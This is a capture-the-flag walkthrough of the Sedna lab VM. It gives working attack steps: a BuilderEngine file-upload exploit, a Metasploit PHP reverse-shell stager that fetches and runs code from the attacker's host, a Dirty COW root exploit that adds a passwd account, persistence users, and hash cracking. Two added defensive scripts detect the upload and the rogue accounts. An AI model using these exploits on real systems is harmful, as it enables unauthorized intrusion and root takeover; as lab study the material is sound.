CTF Sedna from Viper (hackfest 2016)

Hi everyone, I did the first Vuln VM from hackfest 2016 not long ago and I want to try this one now. It's the second one by @ViperBlackSkull and it is the second walkthrough for me, so if you need more information you can reach me on Twitter at @marghost. You can get the virtual machine HERE. So let's get started.

First of all, let's make a quick nmap and a nikto scan. I had already made those, so I will just copy my note file. (Always open a notepad when you are hacking; it is the best advice I can give to you.)

[code language="text"]
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).

111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 38749/udp status
|_ 100024 1 53495/tcp status

8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| NetBIOS computer name: SEDNA
| Workgroup: WORKGROUP
|_ System time: 2017-03-17T15:38:30-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

80
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting…
+ OSVDB-3092: /system/: This might be interesting…
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.

8080
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
[/code]

Ok, so here we see many things. First of all we have two web servers, one Samba server that can maybe be exploited, an RPC server that may be used for an unbound connection to the server, and of course SSH.

I tried first to find an exploit for the RPC server but I had no luck; Metasploit had exploits to DDoS or crash it, and the other exploits required NFS. I turned to the web servers. The one on port 80 has a robots file that is of no use. I skipped to 8080 and tried to poke around Tomcat; you need to be authenticated to use the main exploit, and the default username:password did not work. I tried to bruteforce the password with the tomcat_mgr_login auxiliary scanner from Metasploit and nothing was found.

So I put my attention on the port 80 server: there is nothing interesting in the /files/ directory. The system and user directories are locked down… The README of the icons directory is nothing useful. I found something interesting in license.txt: the site uses BuilderEngine. A quick Google search pointed out that I can exploit this to send a reverse PHP shell.

So first of all we need to create the builderengine.php file that will send malicious code into the /files/ directory of the remote server.

[code language="php"]
<!--
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
1) Unauthenticated Unrestricted File Upload:
POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
Vulnerable Parameter: files[]
We can upload test.php and reach the file via the following link: /files/test.php
-->
<html>
<body>
<form method="post" action="http://192.168.1.16/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
[/code]

After that, start a PHP server and open the builderengine.php that you just created.

[code language="text"]php -S 127.0.0.1:80[/code]

Start Metasploit and enter the right commands to start a web_delivery exploit:

[code language="text"]use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.14
set payload php/meterpreter/reverse_tcp
run[/code]

When you run the exploit it will give you an address; just create a remotexploit.php file and fill it like this:

[code language="php"]<?php
// Fetch and run the stager served by Metasploit's web_delivery (straight quotes are required here; curly quotes break PHP)
eval(file_get_contents('http://192.168.1.14:8080/9HL33yWdUR4KFo'));
?>[/code]

Now use the upload form to send this little PHP gift from Metasploit. Metasploit will then open a session; interact with it:

[code language="text"]sessions -i 1[/code]

[code language="text"]python -c 'import pty; pty.spawn("/bin/bash")'[/code]

Done, I have a shell! First win.
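From the defender's side, the upload used in this section leaves two traces in the Apache access log: a POST to the jquery-file-upload endpoint and a 200 for a .php file served from /files/. The following Python script is an added example (mine, not part of the original post) that scans Apache combined-log lines for both patterns; the log lines, timestamps, IP and file name are constructed for the demo.

```python
import re
from collections import namedtuple

# Apache "combined" log format; the sample lines further down are constructed, not real logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Unauthenticated upload endpoint named in the exploit header above, and the directory uploads land in.
UPLOAD_ENDPOINT = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
UPLOAD_DIR = "/files/"
SCRIPT_EXTENSIONS = (".php", ".phtml", ".php5")

Finding = namedtuple("Finding", "ip ts kind path")


def scan_access_log(lines):
    """Return Findings for POSTs to the upload endpoint and for scripts served from the upload dir."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m["path"].split("?", 1)[0]  # drop any query string
        if m["method"] == "POST" and path.rstrip("/") == UPLOAD_ENDPOINT.rstrip("/"):
            findings.append(Finding(m["ip"], m["ts"], "upload_endpoint_post", path))
        elif (path.startswith(UPLOAD_DIR)
              and path.lower().endswith(SCRIPT_EXTENSIONS)
              and m["status"].startswith("2")):
            # a server-side script under the upload directory was executed successfully
            findings.append(Finding(m["ip"], m["ts"], "script_served_from_upload_dir", path))
    return findings


# Constructed sample log (hypothetical client 192.168.1.14 and file name).
SAMPLE_LOG = [
    '192.168.1.14 - - [17/Mar/2017:15:40:01 -0400] "GET /license.txt HTTP/1.1" 200 1732',
    '192.168.1.14 - - [17/Mar/2017:15:41:10 -0400] "POST /themes/dashboard/assets/plugins/'
    'jquery-file-upload/server/php/ HTTP/1.1" 200 188',
    '192.168.1.14 - - [17/Mar/2017:15:41:12 -0400] "GET /files/remotexploit.php HTTP/1.1" 200 0',
    '192.168.1.14 - - [17/Mar/2017:15:41:13 -0400] "GET /files/ HTTP/1.1" 200 917',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.ts} {f.ip} {f.kind} {f.path}")
```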

A quick look tells me that this Linux kernel is vulnerable to the Dirty COW exploit:

[code language="text"]www-data@Sedna:/var/www$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux [/code]


Sooo, exploiting Dirty COW:

[code language="bash"]curl https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c

<githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4805 100 4805 0 0 29333 0 --:--:-- --:--:-- --:--:-- 29478
www-data@Sedna:/var/www/html/files$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@Sedna:/var/www/html/files$ ./dirty
./dirty
Please enter the new password: test
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b77cc000
ptrace 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b77cc000
madvise 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
192.168.1.16 - Meterpreter session 1 closed. Reason: Died[/code]

Once it has been exploited, ruuuun to SSH and log in as fast as you can. You are on the edge, as Dirty COW is unstable as FU** and can cause a kernel panic at any time. To make it stable you need to enter one line:

[code language="bash"]echo 0 > /proc/sys/vm/dirty_writeback_centisecs[/code]

It should look like this:

[code language="bash"]root@kali:~# ssh [email protected]
[email protected]'s password:
Added user firefart.

Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Mar 20 08:25:24 EDT 2017

System load: 0.15 Memory usage: 2% Processes: 57
Usage of /: 29.7% of 7.26GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126
firefart@Sedna:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
firefart@Sedna:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Sedna:~# adduser pwned
Adding user `pwned' ...
Adding new group `pwned' (1001) ...
Adding new user `pwned' (1001) with group `pwned' ...
Creating home directory `/home/pwned' ...
Copying files from `/etc/skel' ...
no talloc stackframe at ../source3/param/loadparm.c:4864, leaking memory
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for pwned
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
firefart@Sedna:~# usermod -aG sudo pwned[/code]

As you can see here, the line is entered right after the SSH login, and I make a root user right after, just in case something goes wrong.

I am groot! It’s another win :p
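The two changes made above are exactly what a host audit should catch: a second UID-0 account whose hash sits directly in /etc/passwd instead of /etc/shadow, and a new member of the sudo group. This Python check is an added example (mine, not from the post) that runs over constructed /etc/passwd and /etc/group contents modelled on the session output; the "baseline" copy stands in for the /tmp/passwd.bak backup the exploit mentions.

```python
# Constructed samples modelled on the session above (not the VM's real files).
PASSWD_BASELINE = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""
PASSWD_CURRENT = PASSWD_BASELINE + """firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
pwned:x:1001:1001:,,,:/home/pwned:/bin/bash
"""
GROUP_CURRENT = """root:x:0:
sudo:x:27:pwned
pwned:x:1001:
"""


def account_names(passwd_text):
    """Set of user names in passwd-format text (blank and comment lines ignored)."""
    return {l.split(":")[0] for l in passwd_text.splitlines() if l and not l.startswith("#")}


def new_accounts(baseline_text, current_text):
    """Accounts present now but absent from the backed-up copy."""
    return sorted(account_names(current_text) - account_names(baseline_text))


def audit_accounts(passwd_text, group_text, expected_sudo=()):
    """Return (kind, subject) findings: UID-0 clones, hashes in passwd, unexpected sudoers."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed_passwd_line", line))
            continue
        name, pw_field, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(("extra_uid0_account", name))
        # With shadow passwords the second field is "x" or a lock marker, never a real hash.
        if pw_field not in ("x", "*", "!", "!!", ""):
            findings.append(("hash_in_passwd", name))
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "sudo":
            for member in filter(None, fields[3].split(",")):
                if member not in expected_sudo:
                    findings.append(("unexpected_sudo_member", member))
    return findings


if __name__ == "__main__":
    print("new accounts since backup:", new_accounts(PASSWD_BASELINE, PASSWD_CURRENT))
    for kind, subject in audit_accounts(PASSWD_CURRENT, GROUP_CURRENT):
        print(f"{kind}: {subject}")
```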

Now we go fishing for flags. I found the first two flags the easy way by running a search as root:

[code]
firefart@Sedna:/# find . -name "flag.txt"
./var/www/flag.txt
./root/flag.txt
firefart@Sedna:/# cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
firefart@Sedna:/# cat /root/flag.txt
a10828bee17db751de4b936614558305
firefart@Sedna:/#
[/code]

Ok, now I need to find the two post-exploit flags. My first reflex was to go and investigate the /files/users/ directory of the port 80 server… this was a dead end. The next thing to snoop in was the Tomcat install, which I was not able to log in to even after I tried to bruteforce the password.

So a little Google search pointed out that Tomcat passwords are inside '/etc/tomcat7/tomcat-users.xml'.

This is what I found:

[code language="xml"]<role rolename="manager-gui"/>
<user username="tomcat" password="submitthisforpoints" roles="manager-gui"/>
</tomcat-users>[/code]

Looks like I found a flag!

Now it is time to log in to the Tomcat server. Nothing to be found there.

I snooped around a little more. Nothing to see in the running processes (ps -aux | less).

No special cron was used (/etc/crontab).

I found it!!! A user named crackmeforpoints is inside the user list (cut -d: -f1 /etc/passwd):
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::

So I will try to john my way to this password overnight… almost done!

[code language="bash"]root@kali:~/Downloads# john ./crack.password.db
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status[/code]

Ok, after a night John the crazy didn't crack the password, so it is a little more complex than I expected. I got the flag and the job is done for me :). Have a nice day and I will see you in the next walkthrough.

M.
